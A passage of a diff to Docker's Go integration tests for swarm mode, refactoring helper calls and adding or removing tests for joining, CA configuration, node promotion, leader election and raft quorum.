+		RemoteAddrs: []string{d1.SwarmListenAddr()},
+	})
 	c.Assert(err, checker.NotNil)
 	c.Assert(err.Error(), checker.Contains, "join token is necessary")
-	info, err = d2.info()
-	c.Assert(err, checker.IsNil)
+	info = d2.SwarmInfo(c)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive)
 
-	workerToken = d1.joinTokens(c).Worker
+	workerToken = d1.JoinTokens(c).Worker
 
-	c.Assert(d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil)
-	info, err = d2.info()
-	c.Assert(err, checker.IsNil)
+	d2.SwarmJoin(c, swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.SwarmListenAddr()}})
+	info = d2.SwarmInfo(c)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
-	c.Assert(d2.Leave(false), checker.IsNil)
-	info, err = d2.info()
-	c.Assert(err, checker.IsNil)
+	c.Assert(d2.SwarmLeave(false), checker.IsNil)
+	info = d2.SwarmInfo(c)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive)
 
 	// change spec, don't change tokens
-	d1.updateSwarm(c, func(s *swarm.Spec) {})
+	d1.UpdateSwarm(c, func(s *swarm.Spec) {})
 
-	err = d2.Join(swarm.JoinRequest{RemoteAddrs: []string{d1.listenAddr}})
+	err = c2.SwarmJoin(context.Background(), swarm.JoinRequest{
+		ListenAddr:  d2.SwarmListenAddr(),
+		RemoteAddrs: []string{d1.SwarmListenAddr()},
+	})
 	c.Assert(err, checker.NotNil)
 	c.Assert(err.Error(), checker.Contains, "join token is necessary")
-	info, err = d2.info()
-	c.Assert(err, checker.IsNil)
+	info = d2.SwarmInfo(c)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive)
 
-	c.Assert(d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil)
-	info, err = d2.info()
-	c.Assert(err, checker.IsNil)
+	d2.SwarmJoin(c, swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.SwarmListenAddr()}})
+	info = d2.SwarmInfo(c)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
-	c.Assert(d2.Leave(false), checker.IsNil)
-	info, err = d2.info()
-	c.Assert(err, checker.IsNil)
+	c.Assert(d2.SwarmLeave(false), checker.IsNil)
+	info = d2.SwarmInfo(c)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive)
 }
 
+func (s *DockerSwarmSuite) TestUpdateSwarmAddExternalCA(c *check.C) {
+	d1 := s.AddDaemon(c, false, false)
+	d1.SwarmInit(c, swarm.InitRequest{})
+	d1.UpdateSwarm(c, func(s *swarm.Spec) {
+		s.CAConfig.ExternalCAs = []*swarm.ExternalCA{
+			{
+				Protocol: swarm.ExternalCAProtocolCFSSL,
+				URL:      "https://thishasnoca.org",
+			},
+			{
+				Protocol: swarm.ExternalCAProtocolCFSSL,
+				URL:      "https://thishasacacert.org",
+				CACert:   "cacert",
+			},
+		}
+	})
+	info := d1.SwarmInfo(c)
+	c.Assert(info.Cluster.Spec.CAConfig.ExternalCAs, checker.HasLen, 2)
+	c.Assert(info.Cluster.Spec.CAConfig.ExternalCAs[0].CACert, checker.Equals, "")
+	c.Assert(info.Cluster.Spec.CAConfig.ExternalCAs[1].CACert, checker.Equals, "cacert")
+}
+
 func (s *DockerSwarmSuite) TestAPISwarmCAHash(c *check.C) {
 	d1 := s.AddDaemon(c, true, true)
 	d2 := s.AddDaemon(c, false, false)
-	splitToken := strings.Split(d1.joinTokens(c).Worker, "-")
+	splitToken := strings.Split(d1.JoinTokens(c).Worker, "-")
 	splitToken[2] = "1kxftv4ofnc6mt30lmgipg6ngf9luhwqopfk1tz6bdmnkubg0e"
 	replacementToken := strings.Join(splitToken, "-")
-	err := d2.Join(swarm.JoinRequest{JoinToken: replacementToken, RemoteAddrs: []string{d1.listenAddr}})
+	c2 := d2.NewClientT(c)
+	err := c2.SwarmJoin(context.Background(), swarm.JoinRequest{
+		ListenAddr:  d2.SwarmListenAddr(),
+		JoinToken:   replacementToken,
+		RemoteAddrs: []string{d1.SwarmListenAddr()},
+	})
 	c.Assert(err, checker.NotNil)
 	c.Assert(err.Error(), checker.Contains, "remote CA does not match fingerprint")
 }
 
 func (s *DockerSwarmSuite) TestAPISwarmPromoteDemote(c *check.C) {
 	d1 := s.AddDaemon(c, false, false)
-	c.Assert(d1.Init(swarm.InitRequest{}), checker.IsNil)
+	d1.SwarmInit(c, swarm.InitRequest{})
 	d2 := s.AddDaemon(c, true, false)
 
-	info, err := d2.info()
-	c.Assert(err, checker.IsNil)
+	info := d2.SwarmInfo(c)
 	c.Assert(info.ControlAvailable, checker.False)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
 
-	d1.updateNode(c, d2.NodeID, func(n *swarm.Node) {
+	d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) {
 		n.Spec.Role = swarm.NodeRoleManager
 	})
 
-	waitAndAssert(c, defaultReconciliationTimeout, d2.checkControlAvailable, checker.True)
+	waitAndAssert(c, defaultReconciliationTimeout, d2.CheckControlAvailable, checker.True)
 
-	d1.updateNode(c, d2.NodeID, func(n *swarm.Node) {
+	d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) {
 		n.Spec.Role = swarm.NodeRoleWorker
 	})
 
-	waitAndAssert(c, defaultReconciliationTimeout, d2.checkControlAvailable, checker.False)
+	waitAndAssert(c, defaultReconciliationTimeout, d2.CheckControlAvailable, checker.False)
+
+	// Wait for the role to change to worker in the cert. This is partially
+	// done because it's something worth testing in its own right, and
+	// partially because changing the role from manager to worker and then
+	// back to manager quickly might cause the node to pause for awhile
+	// while waiting for the role to change to worker, and the test can
+	// time out during this interval.
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		certBytes, err := ioutil.ReadFile(filepath.Join(d2.Folder, "root", "swarm", "certificates", "swarm-node.crt"))
+		if err != nil {
+			return "", check.Commentf("error: %v", err)
+		}
+		certs, err := helpers.ParseCertificatesPEM(certBytes)
+		if err == nil && len(certs) > 0 && len(certs[0].Subject.OrganizationalUnit) > 0 {
+			return certs[0].Subject.OrganizationalUnit[0], nil
+		}
+		return "", check.Commentf("could not get organizational unit from certificate")
+	}, checker.Equals, "swarm-worker")
 
 	// Demoting last node should fail
-	node := d1.getNode(c, d1.NodeID)
+	node := d1.GetNode(c, d1.NodeID())
 	node.Spec.Role = swarm.NodeRoleWorker
 	url := fmt.Sprintf("/nodes/%s/update?version=%d", node.ID, node.Version.Index)
-	status, out, err := d1.SockRequest("POST", url, node.Spec)
+	res, body, err := request.Post(url, request.Host(d1.Sock()), request.JSONBody(node.Spec))
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusInternalServerError, check.Commentf("output: %q", string(out)))
-	c.Assert(string(out), checker.Contains, "last manager of the swarm")
-	info, err = d1.info()
+	b, err := request.ReadBody(body)
 	c.Assert(err, checker.IsNil)
+	c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest, check.Commentf("output: %q", string(b)))
+
+	// The warning specific to demoting the last manager is best-effort and
+	// won't appear until the Role field of the demoted manager has been
+	// updated.
+	// Yes, I know this looks silly, but checker.Matches is broken, since
+	// it anchors the regexp contrary to the documentation, and this makes
+	// it impossible to match something that includes a line break.
+	if !strings.Contains(string(b), "last manager of the swarm") {
+		c.Assert(string(b), checker.Contains, "this would result in a loss of quorum")
+	}
+	info = d1.SwarmInfo(c)
 	c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive)
 	c.Assert(info.ControlAvailable, checker.True)
 
 	// Promote already demoted node
-	d1.updateNode(c, d2.NodeID, func(n *swarm.Node) {
+	d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) {
 		n.Spec.Role = swarm.NodeRoleManager
 	})
 
-	waitAndAssert(c, defaultReconciliationTimeout, d2.checkControlAvailable, checker.True)
-}
-
-func (s *DockerSwarmSuite) TestAPISwarmServicesEmptyList(c *check.C) {
-	d := s.AddDaemon(c, true, true)
-
-	services := d.listServices(c)
-	c.Assert(services, checker.NotNil)
-	c.Assert(len(services), checker.Equals, 0, check.Commentf("services: %#v", services))
-}
-
-func (s *DockerSwarmSuite) TestAPISwarmServicesCreate(c *check.C) {
-	d := s.AddDaemon(c, true, true)
-
-	instances := 2
-	id := d.createService(c, simpleTestService, setInstances(instances))
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances)
-
-	service := d.getService(c, id)
-	instances = 5
-	d.updateService(c, service, setInstances(instances))
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances)
-
-	d.removeService(c, service.ID)
-	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 0)
-}
-
-func (s *DockerSwarmSuite) TestAPISwarmServicesMultipleAgents(c *check.C) {
-	d1 := s.AddDaemon(c, true, true)
-	d2 := s.AddDaemon(c, true, false)
-	d3 := s.AddDaemon(c, true, false)
-
-	time.Sleep(1 * time.Second) // make sure all daemons are ready to accept tasks
-
-	instances := 9
-	id := d1.createService(c, simpleTestService, setInstances(instances))
-
-	waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.GreaterThan, 0)
-	waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.GreaterThan, 0)
-	waitAndAssert(c, defaultReconciliationTimeout, d3.checkActiveContainerCount, checker.GreaterThan, 0)
-
-	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances)
-
-	// reconciliation on d2 node down
-	c.Assert(d2.Stop(), checker.IsNil)
-
-	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances)
-
-	// test downscaling
-	instances = 5
-	d1.updateService(c, d1.getService(c, id), setInstances(instances))
-	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances)
-
-}
-
-func (s *DockerSwarmSuite) TestAPISwarmServicesCreateGlobal(c *check.C) {
-	d1 := s.AddDaemon(c, true, true)
-	d2 := s.AddDaemon(c, true, false)
-	d3 := s.AddDaemon(c, true, false)
-
-	d1.createService(c, simpleTestService, setGlobalMode)
-
-	waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, 1)
-	waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 1)
-	waitAndAssert(c, defaultReconciliationTimeout, d3.checkActiveContainerCount, checker.Equals, 1)
-
-	d4 := s.AddDaemon(c, true, false)
-	d5 := s.AddDaemon(c, true, false)
-
-	waitAndAssert(c, defaultReconciliationTimeout, d4.checkActiveContainerCount, checker.Equals, 1)
-	waitAndAssert(c, defaultReconciliationTimeout, d5.checkActiveContainerCount, checker.Equals, 1)
-}
-
-func (s *DockerSwarmSuite) TestAPISwarmServicesUpdate(c *check.C) {
-	const nodeCount = 3
-	var daemons [nodeCount]*SwarmDaemon
-	for i := 0; i < nodeCount; i++ {
-		daemons[i] = s.AddDaemon(c, true, i == 0)
-	}
-	// wait for nodes ready
-	waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount)
-
-	// service image at start
-	image1 := "busybox:latest"
-	// target image in update
-	image2 := "busybox:test"
-
-	// create a different tag
-	for _, d := range daemons {
-		out, err := d.Cmd("tag", image1, image2)
-		c.Assert(err, checker.IsNil, check.Commentf(out))
-	}
-
-	// create service
-	instances := 5
-	parallelism := 2
-	id := daemons[0].createService(c, serviceForUpdate, setInstances(instances))
-
-	// wait for tasks ready
-	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals,
-		map[string]int{image1: instances})
-
-	// issue service update
-	service := daemons[0].getService(c, id)
-	daemons[0].updateService(c, service, setImage(image2))
-
-	// first batch
-	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals,
-		map[string]int{image1: instances - parallelism, image2: parallelism})
-
-	// 2nd batch
-	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals,
-		map[string]int{image1: instances - 2*parallelism, image2: 2 * parallelism})
-
-	// 3nd batch
-	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals,
-		map[string]int{image2: instances})
-
-	// Roll back to the previous version. This uses the CLI because
-	// rollback is a client-side operation.
-	out, err := daemons[0].Cmd("service", "update", "--rollback", id)
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-
-	// first batch
-	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals,
-		map[string]int{image2: instances - parallelism, image1: parallelism})
-
-	// 2nd batch
-	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals,
-		map[string]int{image2: instances - 2*parallelism, image1: 2 * parallelism})
-
-	// 3nd batch
-	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals,
-		map[string]int{image1: instances})
-}
-
-func (s *DockerSwarmSuite) TestAPISwarmServicesFailedUpdate(c *check.C) {
-	const nodeCount = 3
-	var daemons [nodeCount]*SwarmDaemon
-	for i := 0; i < nodeCount; i++ {
-		daemons[i] = s.AddDaemon(c, true, i == 0)
-	}
-	// wait for nodes ready
-	waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount)
-
-	// service image at start
-	image1 := "busybox:latest"
-	// target image in update
-	image2 := "busybox:badtag"
-
-	// create service
-	instances := 5
-	id := daemons[0].createService(c, serviceForUpdate, setInstances(instances))
-
-	// wait for tasks ready
-	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals,
-		map[string]int{image1: instances})
-
-	// issue service update
-	service := daemons[0].getService(c, id)
-	daemons[0].updateService(c, service, setImage(image2), setFailureAction(swarm.UpdateFailureActionPause), setMaxFailureRatio(0.25), setParallelism(1))
-
-	// should update 2 tasks and then pause
-	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceUpdateState(id), checker.Equals, swarm.UpdateStatePaused)
-	v, _ := daemons[0].checkServiceRunningTasks(id)(c)
-	c.Assert(v, checker.Equals, instances-2)
-
-	// Roll back to the previous version. This uses the CLI because
-	// rollback is a client-side operation.
-	out, err := daemons[0].Cmd("service", "update", "--rollback", id)
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-
-	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals,
-		map[string]int{image1: instances})
-}
-
-func (s *DockerSwarmSuite) TestAPISwarmServiceConstraintRole(c *check.C) {
-	const nodeCount = 3
-	var daemons [nodeCount]*SwarmDaemon
-	for i := 0; i < nodeCount; i++ {
-		daemons[i] = s.AddDaemon(c, true, i == 0)
-	}
-	// wait for nodes ready
-	waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount)
-
-	// create service
-	constraints := []string{"node.role==worker"}
-	instances := 3
-	id := daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
-	// wait for tasks ready
-	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances)
-	// validate tasks are running on worker nodes
-	tasks := daemons[0].getServiceTasks(c, id)
-	for _, task := range tasks {
-		node := daemons[0].getNode(c, task.NodeID)
-		c.Assert(node.Spec.Role, checker.Equals, swarm.NodeRoleWorker)
-	}
-	//remove service
-	daemons[0].removeService(c, id)
-
-	// create service
-	constraints = []string{"node.role!=worker"}
-	id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
-	// wait for tasks ready
-	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances)
-	tasks = daemons[0].getServiceTasks(c, id)
-	// validate tasks are running on manager nodes
-	for _, task := range tasks {
-		node := daemons[0].getNode(c, task.NodeID)
-		c.Assert(node.Spec.Role, checker.Equals, swarm.NodeRoleManager)
-	}
-	//remove service
-	daemons[0].removeService(c, id)
-
-	// create service
-	constraints = []string{"node.role==nosuchrole"}
-	id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
-	// wait for tasks created
-	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceTasks(id), checker.Equals, instances)
-	// let scheduler try
-	time.Sleep(250 * time.Millisecond)
-	// validate tasks are not assigned to any node
-	tasks = daemons[0].getServiceTasks(c, id)
-	for _, task := range tasks {
-		c.Assert(task.NodeID, checker.Equals, "")
-	}
-}
-
-func (s *DockerSwarmSuite) TestAPISwarmServiceConstraintLabel(c *check.C) {
-	const nodeCount = 3
-	var daemons [nodeCount]*SwarmDaemon
-	for i := 0; i < nodeCount; i++ {
-		daemons[i] = s.AddDaemon(c, true, i == 0)
-	}
-	// wait for nodes ready
-	waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount)
-	nodes := daemons[0].listNodes(c)
-	c.Assert(len(nodes), checker.Equals, nodeCount)
-
-	// add labels to nodes
-	daemons[0].updateNode(c, nodes[0].ID, func(n *swarm.Node) {
-		n.Spec.Annotations.Labels = map[string]string{
-			"security": "high",
-		}
-	})
-	for i := 1; i < nodeCount; i++ {
-		daemons[0].updateNode(c, nodes[i].ID, func(n *swarm.Node) {
-			n.Spec.Annotations.Labels = map[string]string{
-				"security": "low",
-			}
-		})
-	}
-
-	// create service
-	instances := 3
-	constraints := []string{"node.labels.security==high"}
-	id := daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
-	// wait for tasks ready
-	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances)
-	tasks := daemons[0].getServiceTasks(c, id)
-	// validate all tasks are running on nodes[0]
-	for _, task := range tasks {
-		c.Assert(task.NodeID, checker.Equals, nodes[0].ID)
-	}
-	//remove service
-	daemons[0].removeService(c, id)
-
-	// create service
-	constraints = []string{"node.labels.security!=high"}
-	id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
-	// wait for tasks ready
-	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances)
-	tasks = daemons[0].getServiceTasks(c, id)
-	// validate all tasks are NOT running on nodes[0]
-	for _, task := range tasks {
-		c.Assert(task.NodeID, checker.Not(checker.Equals), nodes[0].ID)
-	}
-	//remove service
-	daemons[0].removeService(c, id)
-
-	constraints = []string{"node.labels.security==medium"}
-	id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
-	// wait for tasks created
-	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceTasks(id), checker.Equals, instances)
-	// let scheduler try
-	time.Sleep(250 * time.Millisecond)
-	tasks = daemons[0].getServiceTasks(c, id)
-	// validate tasks are not assigned
-	for _, task := range tasks {
-		c.Assert(task.NodeID, checker.Equals, "")
-	}
-	//remove service
-	daemons[0].removeService(c, id)
-
-	// multiple constraints
-	constraints = []string{
-		"node.labels.security==high",
-		fmt.Sprintf("node.id==%s", nodes[1].ID),
-	}
-	id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances))
-	// wait for tasks created
-	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceTasks(id), checker.Equals, instances)
-	// let scheduler try
-	time.Sleep(250 * time.Millisecond)
-	tasks = daemons[0].getServiceTasks(c, id)
-	// validate tasks are not assigned
-	for _, task := range tasks {
-		c.Assert(task.NodeID, checker.Equals, "")
-	}
-	// make nodes[1] fulfills the constraints
-	daemons[0].updateNode(c, nodes[1].ID, func(n *swarm.Node) {
-		n.Spec.Annotations.Labels = map[string]string{
-			"security": "high",
-		}
-	})
-	// wait for tasks ready
-	waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances)
-	tasks = daemons[0].getServiceTasks(c, id)
-	for _, task := range tasks {
-		c.Assert(task.NodeID, checker.Equals, nodes[1].ID)
-	}
-}
-
-func (s *DockerSwarmSuite) TestAPISwarmServicesStateReporting(c *check.C) {
-	testRequires(c, SameHostDaemon)
-	testRequires(c, DaemonIsLinux)
-
-	d1 := s.AddDaemon(c, true, true)
-	d2 := s.AddDaemon(c, true, true)
-	d3 := s.AddDaemon(c, true, false)
-
-	time.Sleep(1 * time.Second) // make sure all daemons are ready to accept
-
-	instances := 9
-	d1.createService(c, simpleTestService, setInstances(instances))
-
-	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances)
-
-	getContainers := func() map[string]*SwarmDaemon {
-		m := make(map[string]*SwarmDaemon)
-		for _, d := range []*SwarmDaemon{d1, d2, d3} {
-			for _, id := range d.activeContainers() {
-				m[id] = d
-			}
-		}
-		return m
-	}
-
-	containers := getContainers()
-	c.Assert(containers, checker.HasLen, instances)
-	var toRemove string
-	for i := range containers {
-		toRemove = i
-	}
-
-	_, err := containers[toRemove].Cmd("stop", toRemove)
-	c.Assert(err, checker.IsNil)
-
-	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances)
-
-	containers2 := getContainers()
-	c.Assert(containers2, checker.HasLen, instances)
-	for i := range containers {
-		if i == toRemove {
-			c.Assert(containers2[i], checker.IsNil)
-		} else {
-			c.Assert(containers2[i], checker.NotNil)
-		}
-	}
-
-	containers = containers2
-	for i := range containers {
-		toRemove = i
-	}
-
-	// try with killing process outside of docker
-	pidStr, err := containers[toRemove].Cmd("inspect", "-f", "{{.State.Pid}}", toRemove)
-	c.Assert(err, checker.IsNil)
-	pid, err := strconv.Atoi(strings.TrimSpace(pidStr))
-	c.Assert(err, checker.IsNil)
-	c.Assert(syscall.Kill(pid, syscall.SIGKILL), checker.IsNil)
-
-	time.Sleep(time.Second) // give some time to handle the signal
-
-	waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances)
-
-	containers2 = getContainers()
-	c.Assert(containers2, checker.HasLen, instances)
-	for i := range containers {
-		if i == toRemove {
-			c.Assert(containers2[i], checker.IsNil)
-		} else {
-			c.Assert(containers2[i], checker.NotNil)
-		}
-	}
+	waitAndAssert(c, defaultReconciliationTimeout, d2.CheckControlAvailable, checker.True)
 }
 
 func (s *DockerSwarmSuite) TestAPISwarmLeaderProxy(c *check.C) {
@@ -599,20 +275,20 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaderProxy(c *check.C) {
 	d3 := s.AddDaemon(c, true, true)
 
 	// start a service by hitting each of the 3 managers
-	d1.createService(c, simpleTestService, func(s *swarm.Service) {
+	d1.CreateService(c, simpleTestService, func(s *swarm.Service) {
 		s.Spec.Name = "test1"
 	})
-	d2.createService(c, simpleTestService, func(s *swarm.Service) {
+	d2.CreateService(c, simpleTestService, func(s *swarm.Service) {
 		s.Spec.Name = "test2"
 	})
-	d3.createService(c, simpleTestService, func(s *swarm.Service) {
+	d3.CreateService(c, simpleTestService, func(s *swarm.Service) {
 		s.Spec.Name = "test3"
 	})
 
 	// 3 services should be started now, because the requests were proxied to leader
 	// query each node and make sure it returns 3 services
-	for _, d := range []*SwarmDaemon{d1, d2, d3} {
-		services := d.listServices(c)
+	for _, d := range []*daemon.Daemon{d1, d2, d3} {
+		services := d.ListServices(c)
 		c.Assert(services, checker.HasLen, 3)
 	}
 }
@@ -624,23 +300,23 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaderElection(c *check.C) {
 	d3 := s.AddDaemon(c, true, true)
 
 	// assert that the first node we made is the leader, and the other two are followers
-	c.Assert(d1.getNode(c, d1.NodeID).ManagerStatus.Leader, checker.True)
-	c.Assert(d1.getNode(c, d2.NodeID).ManagerStatus.Leader, checker.False)
-	c.Assert(d1.getNode(c, d3.NodeID).ManagerStatus.Leader, checker.False)
+	c.Assert(d1.GetNode(c, d1.NodeID()).ManagerStatus.Leader, checker.True)
+	c.Assert(d1.GetNode(c, d2.NodeID()).ManagerStatus.Leader, checker.False)
+	c.Assert(d1.GetNode(c, d3.NodeID()).ManagerStatus.Leader, checker.False)
 
-	d1.Stop() // stop the leader
+	d1.Stop(c)
 
 	var (
-		leader    *SwarmDaemon   // keep track of leader
-		followers []*SwarmDaemon // keep track of followers
+		leader    *daemon.Daemon   // keep track of leader
+		followers []*daemon.Daemon // keep track of followers
 	)
-	checkLeader := func(nodes ...*SwarmDaemon) checkF {
+	checkLeader := func(nodes ...*daemon.Daemon) checkF {
 		return func(c *check.C) (interface{}, check.CommentInterface) {
 			// clear these out before each run
 			leader = nil
 			followers = nil
 			for _, d := range nodes {
-				if d.getNode(c, d.NodeID).ManagerStatus.Leader {
+				if d.GetNode(c, d.NodeID()).ManagerStatus.Leader {
 					leader = d
 				} else {
 					followers = append(followers, d)
@@ -651,7 +327,7 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaderElection(c *check.C) {
 				return false, check.Commentf("no leader elected")
 			}
 
-			return true, check.Commentf("elected %v", leader.id)
+			return true, check.Commentf("elected %v", leader.ID())
 		}
 	}
 
@@ -665,7 +341,7 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaderElection(c *check.C) {
 	stableleader := leader
 
 	// add the d1, the initial leader, back
-	d1.Start()
+	d1.Start(c)
 
 	// TODO(stevvooe): may need to wait for rejoin here
 
@@ -677,7 +353,7 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaderElection(c *check.C) {
 	c.Assert(leader, checker.NotNil)
 	c.Assert(followers, checker.HasLen, 2)
 	// and that after we added d1 back, the leader hasn't changed
-	c.Assert(leader.NodeID, checker.Equals, stableleader.NodeID)
+	c.Assert(leader.NodeID(), checker.Equals, stableleader.NodeID())
 }
 
 func (s *DockerSwarmSuite) TestAPISwarmRaftQuorum(c *check.C) {
@@ -685,172 +361,58 @@ func (s *DockerSwarmSuite) TestAPISwarmRaftQuorum(c *check.C) {
 	d2 := s.AddDaemon(c, true, true)
 	d3 := s.AddDaemon(c, true, true)
 
-	d1.createService(c, simpleTestService)
+	d1.CreateService(c, simpleTestService)
 
-	c.Assert(d2.Stop(), checker.IsNil)
+	d2.Stop(c)
 
 	// make sure there is a leader
-	waitAndAssert(c, defaultReconciliationTimeout, d1.checkLeader, checker.IsNil)
+	waitAndAssert(c, defaultReconciliationTimeout, d1.CheckLeader, checker.IsNil)
 
-	d1.createService(c, simpleTestService, func(s *swarm.Service) {
+	d1.CreateService(c, simpleTestService, func(s *swarm.Service) {
 		s.Spec.Name = "top1"
 	})
 
-	c.Assert(d3.Stop(), checker.IsNil)
-
-	// make sure there is a leader
-	waitAndAssert(c, defaultReconciliationTimeout, d1.checkLeader, checker.IsNil)
+	d3.Stop(c)
 
 	var service swarm.Service
 	simpleTestService(&service)
 	service.Spec.Name = "top2"
-	status, out, err := d1.SockRequest("POST", "/services/create", service.Spec)
+	cli, err := d1.NewClient()
 	c.Assert(err, checker.IsNil)
-	c.Assert(status, checker.Equals, http.StatusInternalServerError, check.Commentf("deadline exceeded", string(out)))
+	defer cli.Close()
+
+	// d1 will eventually step down from leader because there is no longer an active quorum, wait for that to happen
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		_, err = cli.ServiceCreate(context.Background(), service.Spec, types.ServiceCreateOptions{})
+		return err.Error(), nil
+	}, checker.Contains, "Make sure more than half of the managers are online.")
 
-	c.Assert(d2.Start(), checker.IsNil)
+	d2.Start(c)
 
 	// make sure there is a leader
-	waitAndAssert(c, defaultReconciliationTimeout, d1.checkLeader, checker.IsNil)
+	waitAndAssert(c, defaultReconciliationTimeout, d1.CheckLeader, checker.IsNil)
 
-	d1.createService(c, simpleTestService, func(s *swarm.Service) {
+	d1.CreateService(c, simpleTestService, func(s *swarm.Service) {
 		s.Spec.Name = "top3"
 	})
 }
 
-func (s *DockerSwarmSuite) TestAPISwarmListNodes(c *check.C) {
-	d1 := s.AddDaemon(c, true, true)
-	d2 := s.AddDaemon(c, true, false)
-	d3 := s.AddDaemon(c, true, false)
-
-	nodes := d1.listNodes(c)
-	c.Assert(len(nodes), checker.Equals, 3, check.Commentf("nodes: %#v", nodes))
-
-loop0:
-	for _, n := range nodes {
-		for _, d := range []*SwarmDaemon{d1, d2, d3} {
-			if n.ID == d.NodeID {
-				continue loop0
-			}
-		}
-		c.Errorf("unknown nodeID %v", n.ID)
-	}
-}
-
-func (s *DockerSwarmSuite) TestAPISwarmNodeUpdate(c *check.C) {
-	d := s.AddDaemon(c, true, true)
-
-	nodes := d.listNodes(c)
-
-	d.updateNode(c, nodes[0].ID, func(n *swarm.Node) {
-		n.Spec.Availability = swarm.NodeAvailabilityPause
-	})
-
-	n := d.getNode(c, nodes[0].ID)
-	c.Assert(n.Spec.Availability, checker.Equals, swarm.NodeAvailabilityPause)
-}
-
